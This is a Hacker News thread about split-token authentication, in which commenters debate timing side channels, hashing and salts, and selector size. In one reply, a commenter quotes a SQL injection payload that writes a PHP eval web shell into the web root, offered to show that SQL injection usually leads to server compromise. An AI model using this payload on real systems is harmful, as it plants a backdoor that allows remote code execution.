
Split Tokens: Token-Based Authentication Protocols Without Side-Channels - CiPHPerCoder
https://paragonie.com/blog/2017/02/split-tokens-token-based-authentication-protocols-without-side-channels
======
tbrowbdidnso
The author is mistaken about the side channel existing. In the most common
case of login and token generation it just doesn't.

With logins you compare the hashed password to a stored hash. The author
mentions that you can tell how much of the hashes match because the compare
function exits early if they do. This might be true, but it doesn't give you
anything.

When using a secure hash function with a salt, the attacker being able to
guess how much of the two hashes match gives him no information because:

1) he doesn't know what hash is stored 2) he doesn't know what his password
attempt hashed to 3) he doesn't know the salt

The only thing that the attacker knows is that he created a hash with his
attempt that matches the first few bytes of the real hash. If you use a strong
hashing algorithm this is useless information and will happen at random.

~~~
amluto
That's not how I read it at all. The author is saying that non-password tokens
can be vulnerable if you don't treat them the same way you'd treat passwords
and is essentially suggesting that they be split into username-like and
password-like fields.

There's another unrelated solution to the problem: make the tokens be AEAD [1]
output from a scheme with a global (perhaps rotated) secret or signed output
from an asymmetric cryptosystem. Then you're protected by the usual AEAD or
digital signature guarantees as long as you properly verify the token before
doing something silly like looking up the ciphertext in a database.

[1] Strictly speaking, encryption may be unnecessary depending on what's in
the token.

~~~
tbrowbdidnso
If you want to avoid timing attacks on the username and pw isn't the easiest
way to just hash them as if they're both passwords? (at least on initial
login). Since the hashes are cryptographically secure you can't infer any
timing information from incorrect guesses

~~~
CiPHPerCoder
We aren't interested in timing attacks on username+password, we're interested
in timing attacks on authentication schemes that only involve one string (i.e.
ONLY a token).

Simply hashing it before a lookup may be sufficient.

However, it's actually easier to reason about separating the search operating
(which leaks timing information unavoidably) from the validation operation
(which _shouldn 't_ leak timing information if we can avoid it) than relying
on a hash function to blind the operation completely.

~~~
foo101
Can you explain in what way is it easier to reason about separating the search
operation from the validation operation?

I can argue that it is easier to reason about simply hashing and then looking
up because once hashed, the lookup does not leak any timing information,
whereas in your solution the lookup does leak timing information.

Can you refute my argument?

~~~
CiPHPerCoder
Hashing is deterministic.

If you give the system m, you can probably deduce H(m). If you can send
candidates m, m', m'', etc. and compare the timing information of H(m), H(m'),
H(m''), etc. you can learn some information about the hash being stored.

This still probably isn't exploitable (you'd need a practical preimage attack,
at a minimum), but you're still leaking _some_ knowledge from the timing leak
of the comparison of the candidate hash with the stored hash.

With a split token approach, the verifier is totally unknown to the attacker.
You can generate a valid selector from observing timing observations... and
that's it. Game over. Find another way in the system.

If you have a 128-bit random string as your inputs, this will probably never
be guessed.

It's easier to reason about the security consequences of _no leak_ versus _a
minor, probably impractical leak_.

~~~
tbrowbdidnso
You can mix the hash with a salt that the attacker doesn't and cannot ever
know. This is pretty standard and prevents the leak of timing from revealing
anything about the hash. The only time this fails is if your hash function is
broken, and if that's the case you've got much bigger problems

~~~
earthrise
The salt would need to be kept secret so it shouldn't be called a salt, it
should be called a key. The benefit of Scott's solution compared to this is
that you don't need to deal with all the usability problems associated with
keeping something secret (where should it be stored on the server? how should
it be backed up? how often should it be changed? etc.)

------
foo101
Why is the author using a convoluted scheme of splitting token into selector
and verifier, and then storing hash(verifier) in the database, why not use a
simpler scheme of accepting username and token from the user and storing
hash(token) in the database?

In other words, my question is: Why do you need to split the token at all? Why
not store the hash of the entire token in the database?

So now, the username of the user becomes the selector, and the token becomes
the verifier. What is wrong with this simpler approach?

~~~
CiPHPerCoder
The idea here is to take an existing protocol which previously ONLY gave the
user a random 64 character hex string (representing 32 random bytes), and make
it more secure with no changes to what the user sees.

This is advantageous because such a change could be implemented without
invalidating existing tokens.

> What is wrong with this simpler approach?

Now you're requiring two pieces of data where the connecting user agent only
sends one. If the client is a piece of software, you're imposing a maintenance
burden on them to use the new approach.

What you're calling a "convoluted" scheme ensures a smooth transition. Better
security with no compatibility breaks.

~~~
foo101
If that's the case, then why not hash the entire token and store hash(token)
in the database. Then you can just query for:

    
    
        SELECT tokenid, userid FROM password_reset_tokens WHERE hashed_token = :hashed_token AND NOW() < expire_time
    

If you are worried that two tokens may collide to have the same hash, well
that problem is there with your split-token solution too where token1 and
token2 may collide such that token1 and token2 have the same selector and the
same hash(verifier).

------
foo101
> If you're also concerned about read-write SQL injection being used to forge
> tokens for arbitrary user accounts, you may want to worry instead about the
> attacker using their access to compromise the filesystem and OS.

I don't get this part. Read-write SQL injection does not imply that the
attacker has access to the filesystem. The concern about RW-SQL injection is
still valid. If I can somehow protect an attacker from modifying tokens via
RW-SQL injection, it is still an improvement, and I may not have to worry
about the filesystem being accessed because that may require a non-SQL attack
vector.

~~~
CiPHPerCoder
> I don't get this part. Read-write SQL injection does not imply that the
> attacker has access to the filesystem.

Theoretically no, but in practice, all you really need is

    
    
        SELECT '<?php eval($_GET["foo"]); ' INTO OUTFILE '/var/www/example.com/public_html/backdoor.php';
    

to get access to most servers.

------
foo101
> If your database's primary key is 32 bits (SERIAL in PostgreSQL, INT(11) in
> MySQL, etc.), you want at least 8 bytes for the selector.

32 bits = 4 bytes. How can we store a 8 byte selector in a 32 bit integer
then?

~~~
CiPHPerCoder
You're using a separate column (which is a CHAR, VARCHAR, or TEXT field) to
store the selector INSTEAD of the database primary key.

From the example query:

    
    
        SELECT tokenid, validator, userid FROM password_reset_tokens WHERE selector = :selector AND NOW() < expire_time
    

The columns in this query:

    
    
      - tokenid     -- the primary key
      - selector    -- some text data, used in WHERE clause
      - validator   -- some text data, not used in WHERE clause
      - expire_time -- timestamp
    

You have a 50% chance of a collision in a 64-bit space after 2^32 values. That
means you have a 50% chance of it happening once after you exhaust your 32-bit
primary key space.

[https://en.wikipedia.org/wiki/Birthday_attack](https://en.wikipedia.org/wiki/Birthday_attack)

